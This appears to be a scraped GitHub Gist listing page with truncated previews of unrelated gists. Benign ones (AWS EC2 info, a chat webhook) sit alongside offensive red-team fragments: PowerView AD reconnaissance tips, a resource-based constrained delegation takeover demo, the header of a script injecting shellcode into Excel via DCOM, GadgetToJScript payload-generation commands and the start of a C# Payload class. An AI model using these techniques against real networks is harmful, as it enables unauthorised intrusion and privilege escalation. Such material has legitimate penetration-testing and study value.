@alexlauerman
alexlauerman / printableASCII
Created January 22, 2014 23:46
All printable ASCII for Burp Intruder #python >>> import string >>> for i in string.printable: ... print i
0
1
2
3
4
5
6
7
8
9
@dastergon
dastergon / ec2_info_retriever.py
Last active May 29, 2024 05:17
A basic boto3 based tool for retrieving information from running EC2 instances.
from collections import defaultdict
import boto3
"""
A tool for retrieving basic information from the running EC2 instances.
"""
# Connect to EC2
ec2 = boto3.resource('ec2')
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 18, 2024 07:51
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@ruanbekker
ruanbekker / rocketchat_invoke_webhook_python.py
Created August 2, 2017 23:06
Invoke Rocketchat Incoming Webhook with Python
import requests
import json
uri = 'https://domain.com/hooks/1234AbcD'
data={}
data = {
"username": "Python Bot",
"icon_emoji": ":whale:",
"attachments": [
{
@curi0usJack
curi0usJack / .htaccess
Last active June 6, 2024 18:04
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active June 8, 2024 18:13
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
@joswr1ght
joswr1ght / groupenumeration.ps1
Created January 8, 2020 13:08
Create a Collection of Files for Windows Domain Groups with User Members in Each File
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
@3xpl01tc0d3r
3xpl01tc0d3r / GadgetToJScript Command Reference
Last active September 26, 2022 06:02
GadgetToJScript Code
# Command to generate HTA code using GadgetsToJScript
GadgetToJScript.exe -w hta
# Command to generate JS code using GadgetsToJScript
GadgetToJScript.exe -w js
# Command to generate VBS code using GadgetsToJScript
GadgetToJScript.exe -w vbs
# Command to generate VBA code using GadgetsToJScript
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()